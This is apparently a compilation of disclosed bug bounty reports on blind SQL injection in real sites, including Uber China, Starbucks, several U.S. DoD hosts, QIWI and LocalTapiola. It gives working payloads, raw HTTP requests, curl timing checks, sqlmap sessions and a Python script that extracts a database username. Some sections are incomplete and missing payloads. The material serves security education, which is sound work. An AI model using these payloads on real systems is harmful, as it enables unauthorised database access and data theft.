After subscribing to Uber in China, an advertisement was sent to the associated email account. The unsubscribe link in the email is different than the normal Uber unsubscribe link.
The URL parameter p contains a Base64 encoded JSON object seen below (with the added payload):
{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}
The original request would look like this:
{"user_id": "5755", "receiver": "orange@mymail"}
By issuing the request with the " and sleep(12)=1" payload, the server sleeps for 12 seconds.
Orange Tsai wrote a payload to return the Username and Database of the Database where the Blind SQLI is occurring.
import json
import string
import requests
from urllib import quote
from base64 import b64encode
base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}
for l in range(0, 30):
for i in 'i'+base:
payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i)
new_payload = json.dumps(payload)
new_payload = b64encode(new_payload)
r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload))
if len(r.content)>0:
print i,
break
2. Starbucks
Researcher discovered Time Based Blind SQLi on the news.starbucks.com domain. The vulnerability exists on a HTTP POST request to the home path of the Starbucks domain in the group_id body parameter. The request with payload is illustrated below:
POST / HTTP/1.1
Host: news.starbucks.com
Connection: close
Content-Length: 81
Cache-Control: max-age=0
Origin: https://news.starbucks.com
Content-Type: application/x-www-form-urlencoded
ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(1=1,SLEEP(1),0) AND group_id='1
The request successfully delays the server response time.
The researcher also illustrates how to determine the database version through the following requests using curl:
time curl --data "ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(MID(VERSION(),1,1)='5',SLEEP(1),0) AND group_id='1" https://news.starbucks.com
real 0m4.945s
time curl --data "ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(MID(VERSION(),1,1)='4',SLEEP(1),0) AND group_id='1" https://news.starbucks.com
real 0m1.005s
You can see the response time for version 5 is greater than version 4 meaning the sleep command executed on the first request (version 5) proving the database version is 5.
Exploiting the vulnerability using SQLMap and retrieving the available databases and DBMS info as a PoC:
3. U.S. DoD (SQLMAP Exploiting Blind SQLi)
The URL https://redacted.com/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1 contains a URL parameter c0-param that is vulnerable to Blind SQLi.
In the example below, the researcher uses SQLMap to exploit the vulnerability. On line 68 below, SQLMap displays the database type as a Proof of Concept.
root@kali:~/bugbounty# sqlmap -u "https://████/█████████/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1*"
_
___ ___| |_____ ___ ___ {1.0.8.2#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:21:54
custom injection marking character ('*') found in option '-u'. Do you want to pry
[20:22:03] [INFO] testing connection to the target URL
[20:22:04] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:04] [INFO] testing if the target URL is stable
[20:22:05] [INFO] target URL is stable
[20:22:05] [INFO] testing if URI parameter '#1*' is dynamic
[20:22:05] [WARNING] URI parameter '#1*' does not appear dynamic
[20:22:05] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'Oracle')
[20:22:05] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] y
[20:22:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:22:20] [WARNING] reflective value(s) found and filtering out
[20:22:21] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[20:22:22] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[20:22:22] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[20:22:23] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:22:24] [INFO] testing 'Oracle boolean-based blind - Stacked queries'
[20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:22:50] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[20:23:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:23:10] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:23:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:23:33] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:23:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[20:23:43] [INFO] URI parameter '#1*' is 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' injectable
[20:23:43] [INFO] testing 'Oracle inline queries'
[20:23:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:23:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[20:23:43] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (heavy query)'
[20:23:44] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[20:23:44] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[20:23:45] [INFO] testing 'Oracle AND time-based blind'
[20:23:45] [INFO] testing 'Oracle OR time-based blind'
[20:23:45] [INFO] testing 'Oracle AND time-based blind (comment)'
[20:23:45] [INFO] testing 'Oracle OR time-based blind (comment)'
[20:23:45] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[20:24:16] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[20:24:46] [INFO] URI parameter '#1*' appears to be 'Oracle AND time-based blind (heavy query)' injectable
[20:24:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 418 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)
Payload: https://█████:443/█████/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1' AND 9965=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9965=9965) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(112)||CHR(113)))-- Goij
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: https://██████:443/████/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1' AND 4917=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- vKNF
---
[20:34:42] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[20:34:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/██████████'
[*] shutting down at 20:34:42
4. QIWI SQLi Out of Band Interaction
Quoting the Researcher:
The API interface on https://contactws.contact-sys.com:3456/ accepts a <REQUEST/> body to interact with the server's AppServ object. Because of insufficient input validation, an attacker can abuse the SCEN_ID parameter to inject arbitrary SQL statements into the WHERE clause of the underlying SQL statement. This leads to a blind SQL injection vulnerability, which in turn leads to Remote Code Execution on the server.
The researcher makes use of Burp Suite's Collaborator which is a network service tool that can be used to detect out-of-band SQL injection. In short, this works by providing a unique subdomain which is used in the payload. Using the unique subdomain in the payload, the backend server reaches out to the Burp Collaborator server as it does a DNS lookup of the subdomain. There are other uses for the Burp Collaborator, such as out-of-band exfiltration, but this is enough of a PoC to prove that the server is vulnerable to Blind out-of-band SQLi.
Modifying the SCEN_ID body parameter to use xp_cmdshell and ping the Burp Suite Collaborator server with the unique subdomain generated (yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net). This will make a DNS request to the burpcollaborator.net server with the unique subdomain.
Issuing the request will successfully cause the web server to do a DNS lookup of the domain. The server can be seen reaching out to Burp Suite's Collaborator with the unique subdomain (yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net).
The researcher also used SQLMap to exploit this vulnerability and retrieve the database name. The sqlitest.txt file is the above HTTP POST request.
The lang cookie parameter was found to be vulnerable to SQLI. The request was sent with the following payload, and the server will delayed the response:
The HTTP URL redId parameter on http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674 is vulnerable to Blind SQLi. The researcher illustrates this through the use of SQLMap.
~/sqlmap# ./sqlmap.py -u "http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674" -p regId
.. snip ..
GET parameter 'regId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:
Parameter: regId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: regId=478836614) AND 5454=5454 AND (5202=5202&locationId=464559674
[17:38:22] [INFO] the back-end DBMS is PostgreSQL
web application technology: Apache
back-end DBMS: PostgreSQL
7. LocalTapiola URL Parameter 2
The following payload is URL encoded and submitted in the URL blobwhere parameter:
' AND 5851=DBMS_PIPE.RECEIVE_MESSAGE(1000,5) AND 'bar'='bar
Using Curl the researcher demonstrates the delay in response time of 5 seconds.
15:25 ~: time curl "http://www.lahitapiola.fi/cs/Satellite?blobcol=urldata&blobkey=id&blobtable=MungoBlobs&blobwhere=1310812269330%27%20AND%205851=DBMS_PIPE.RECEIVE_MESSAGE(1000,5)%20AND%20%27bar%27=%27bar" -O /dev/null
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1019 100 1019 0 0 196 0 0:00:05 0:00:05 --:--:-- 256
curl: (3) <url> malformed
real 0m5.186s
user 0m0.004s
sys 0m0.008s
8. RocketChat URL Parameter
The new URL parameter was found to be vulnerable to Blind SQLI.
Payload:
Request:
https://stats2.agilecrm.com/addstats?callback=json949659033379064&guid=f0d3738c-44c0-60a6-44b6-56e14ca30872&sid=2172c2ca-15b6-49c8-052d-b7d817cd280b&url=https%3A%2F%2Frocket.chat%2F&agile=8pat9ou8gh0thqd8dlgctje3go&new=(select*from(select(sleep(5)))a)&ref=&domain=dorgam
#Output presumably from sqlmap
Database version: MySQL 5.0.12
Server hostname: localhost
Databases: information_schema; mysql; performance_schema; stats
Stats: 3; persons; map.
9. Blind SQLi URL Path
The path gets filtered on the backend as a tag and upon retrieving the request it searches for the tag. The path https://betterscience.org/plugin/tag/ filters anything prepended to the URL path as a tag and displays the output. By issuing it a specifically crafted SQL request it is possible to trigger Blind SQLi.
HTTP JSON POST parameter docid is vulnerable to Blind SQLi.
Quoting qonqi:
for a TRUE query we get - {"d":"3"}
for a FALSE - {"d":""}
for a Syntax error - {"Message":"There was an error processing the request.","StackTrace":"","ExceptionType":""}
so using this blind technique we can extract the data from Database
examples
docId:"1 and (select substring(@@version,1,1))='M'" - true
docId:"1 and (select substring(@@version,2,1))='i'" - true
docId:"1 and (select substring(@@version,3,1))='c'" - true
docId:"1 and (select substring(@@version,22,1))='2'"
docId:"1 and (select substring(@@version,23,1))='0'"
docId:"1 and (select substring(@@version,24,1))='0'"
docId:"1 and (select substring(@@version,25,1))='8'"
Issuing the request successfully delays the response.
12. Tube8 2
The topsort URL parameter on https://www.tube8.fr/ajax-hof/?toplimit=2&topsort=followers+or+sleep(0.000000001) is vulnerable to Blind SQLi.
The request below contains the payload in the URL parameter. The researcher stated that any larger value in the sleep function makes the application timeout, possibly due to the injection point being in a WHERE statement which is executing for every record in the table.
13. DoD URL Parameter
There is a HTTP GET URL parameter that is vulnerable to Blind SQL Injection at https://███/pubs/get_publications.php, pub_group_id is the parameter.
Payload below contains a 5 second delay in response in the pub_group_id parameter. Issuing the request successfully delays the response by 5 seconds.
Researcher discovered the labs.data.gov website has a route /dashboard/datagov/csv_to_json that is vulnerable to Blind SQLi on the User-Agent HTTP Header.
Appending the following payload to the User-Agent Header delays the response time by 25 seconds:
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
The appended payload can be seen in the request below. Issuing the response below, the researcher successfully illustrated that the server takes 25 seconds to respond.
GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
15. DoD URL Parameter
The doc_id URL Parameter on the /library.php route was found to be vulnerable to Blind SQLi. Issuing the request below makes the server delay it's response by 5 seconds. The payload 1 AND (SELECT * FROM (SELECT(SLEEP(1)))WUeh) is URL encoded and placed into the doc_id URL parameter.
python sqlmap.py -u https://www.xn--4zhaaaaaaaaa/public/saveCount.cfm?countID=4 --level=3 --risk=3
#Output
Microsoft SQL Server 2008 R2 (SP3) - 10.50.6220.0 (X64&
Mar 19 2015 12:32:14
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)
17. DoD
The route https://███/hro/html/tech.cfm?Sort=SLEEP(25)&ThisType=3 contains the URL parameter S Sort which is vulnerable to Blind SQLi. Issuing the request to the URL with the payload SLEEP(25) will delay the servers response by 25 seconds.
18. HTTP GET URL Parameter
Researcher discovered URL parameter that is vulnerable to Blind SQLi. The payload can be seen in the parameter.
The researcher illustrates how to retrieve the database version through blind SQLi. This will either create a 2 second delay if true, if not the response will be immediate. This can used to iterate over each possible version number to detect which version is currently in use.
The researcher thankfully provided a detailed full write-up here .
The researcher included a video PoC in his description as well .
Researcher discovered the countID URL parameter on the route is vulnerable to Blind SQLi. Illustrated below, the researcher uses SQLMap to exploit the vulnerability and retrieve the banner for the database.
